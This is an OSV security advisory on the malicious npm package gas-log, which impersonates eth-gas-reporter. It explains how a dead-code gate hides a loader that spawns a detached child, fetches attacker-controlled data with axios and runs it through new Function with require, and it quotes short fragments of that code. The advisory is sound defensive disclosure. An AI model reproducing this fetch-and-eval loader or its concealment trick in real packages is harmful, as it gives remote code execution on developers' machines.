OSV ID
MAL-2026-6962
Ecosystem
npm
Summary
gas-log impersonates the legitimate eth-gas-reporter package: it reuses that project's README, keywords, badges, and CHANGELOG, and the README even instructs users to install the target name. The exported Mocha reporter in index.js contains two near-identical implementations. The real reporter (Gas) is defined but not exported; the exported function (log) sets var opt = 1 and unconditionally enters an else branch that calls utils.connectNet(...) , making the always-false if (!opt) guard a dead-code gate that hides the payload as an unreachable variant of the legitimate code. utils.connectNet spawns a detached, unref'd node lib/syncResolve.js child so the loader outlives the parent Mocha process. lib/syncResolve.js issues axios.get(DEV_URI, { headers: { 'x-secret-key': '_' } }) , extracts .data.Cookie from the response, and passes it to new Function.constructor('require', result) with require bound in, then invokes it — an eval of attacker-controlled response bytes with full Node module access, retried 5 times. DEV_URI is empty in this shipped version so the fetch will fail today, but the mechanism is complete and armed: any future publish, DNS resolution, or same-origin redirect activates full RCE on any developer who runs mocha with this reporter. The typosquat framing, the dead-code gate, and the fetch → eval → detached-child chain together are unambiguous supply-chain attack intent.
Source: amazon-inspector (36241e999d92bad738082bf420fc144391735f9f3707bc4baa0153b4cb0eec8a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.